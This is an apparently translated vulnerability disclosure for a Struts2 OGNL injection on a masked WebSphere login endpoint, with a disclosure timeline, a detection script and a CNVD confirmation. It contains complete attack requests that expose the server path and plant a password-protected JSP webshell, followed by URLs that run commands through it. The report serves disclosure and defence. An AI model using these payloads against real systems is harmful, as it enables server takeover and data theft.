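2015-12-17: Details reported to the vendor; awaiting vendor response
2015-12-21: Vendor confirmed; details disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and experts in related fields
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-04: Details disclosed to the public
Remote command execution; arbitrary shells can be written at will...
Visit the URL:
http://**.**.**.**/home2/login.action
As shown in the screenshot below:
The path ends in .action, so check whether a command execution vulnerability exists: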
POST /home2/login.action HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=0000zixCFE_trjmZB_a0TslU7cF:17vj1u2gq; _gscu_168127336=50335137cn6lxp16; _gscbrs_168127336=1; Hm_lvt_3a9042c73cc61230a77e846d4576100c=1450255872,1450334437; Hm_lpvt_3a9042c73cc61230a77e846d4576100c=1450335494; aaaaaaa=b805003caaaaaaa_b805003c
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 258

--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"

-1
--------------------------5423a63046c50524a84963968721
Execution succeeded, revealing the server path:
Attempt to write a webshell (excuteError.jsp):
POST /home2/login.action HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=0000zixCFE_trjmZB_a0TslU7cF:17vj1u2gq; _gscu_168127336=50335137cn6lxp16; _gscbrs_168127336=1; Hm_lvt_3a9042c73cc61230a77e846d4576100c=1450255872,1450334437; Hm_lpvt_3a9042c73cc61230a77e846d4576100c=1450335494; aaaaaaa=b805003caaaaaaa_b805003c
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 680

--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/opt/IBM/WebSphere/AppServerND/profiles/AppSrv01/installedApps/sxpt-03Cell01/idealpbw_20140618_war.ear/idealpbw_20140618.war/excuteError.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"

-1
--------------------------5423a63046c50524a84963968721
This also executed successfully:
Access the webshell just uploaded and execute system commands with echoed output:
http://**.**.**.**/home2/excuteError.jsp?pwd=023&i=ls%20/
http://**.**.**.**/home2/excuteError.jsp?pwd=023&i=ls%20/opt/IBM/WebSphere/AppServerND/profiles/AppSrv01/installedApps/sxpt-03Cell01/idealpbw_20140618_war.ear/idealpbw_20140618.war/
Upgrade Struts2 to the latest version as soon as possible!
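Both requests above carry the OGNL expression in a parameter name that begins with redirect:, one of the name prefixes Struts 2's DefaultActionMapper treats specially. The following check is an added example, not part of the original report: it flags such parameter names in a query string or request body. The function names and sample requests are constructed for illustration, and the sample expressions are harmless.

```python
import re
from urllib.parse import parse_qsl

# Parameter-name prefixes that Struts 2's DefaultActionMapper treats specially.
# Compared in lower case so case variants are flagged as well.
PREFIXES = ("redirect:", "redirectaction:", "action:")
OGNL_OPEN = re.compile(r"[$%]\{")  # start of an OGNL expression
# Capture everything after name= on a part's Content-Disposition line. Payloads
# embed unescaped quotes, so the match runs to end of line, not to the next quote
# (for ordinary parts this over-captures, e.g. a trailing filename attribute).
PART_NAME = re.compile(rb'(?im)^content-disposition:\s*form-data;.*?\bname="?(.*?)\r?$')


def parameter_names(query, content_type, body):
    """Collect parameter names from the query string and the request body."""
    names = [k for k, _ in parse_qsl(query, keep_blank_values=True)]
    ctype = content_type.lower()
    if ctype.startswith("multipart/form-data"):
        names += [m.rstrip(b'"').decode("latin-1") for m in PART_NAME.findall(body)]
    elif ctype.startswith("application/x-www-form-urlencoded"):
        names += [k for k, _ in parse_qsl(body.decode("latin-1"), keep_blank_values=True)]
    return names


def suspicious_names(query, content_type, body):
    """Return names that start with a special prefix and open an OGNL expression."""
    return [n for n in parameter_names(query, content_type, body)
            if n.lower().startswith(PREFIXES) and OGNL_OPEN.search(n)]


# Constructed samples (not captured traffic).
CTYPE = "multipart/form-data; boundary=XBOUNDARY"
FLAGGED = (b'--XBOUNDARY\r\n'
           b'Content-Disposition: form-data; name="redirect:/${"x"+"y"}"\r\n\r\n'
           b'-1\r\n--XBOUNDARY--\r\n')
NORMAL = (b'--XBOUNDARY\r\n'
          b'Content-Disposition: form-data; name="username"\r\n\r\n'
          b'alice\r\n--XBOUNDARY--\r\n')

if __name__ == "__main__":
    print(suspicious_names("", CTYPE, FLAGGED))
    print(suspicious_names("", CTYPE, NORMAL))
    print(suspicious_names("redirect%3A%24%7B1%2B1%7D=x", "", b""))
```

A hit on a .action endpoint is worth blocking at the proxy and reviewing in access logs until the upgrade is in place; a web root should also be checked for unexpected .jsp files such as the one written in this report.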
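Severity: High
Vulnerability Rank: 11
Confirmed: 2015-12-21 17:44
CNVD has confirmed and reproduced the situation described, and it has been forwarded by CNCERT to the Shanghai sub-center, which will coordinate follow-up handling with the organization that manages the website.
None yet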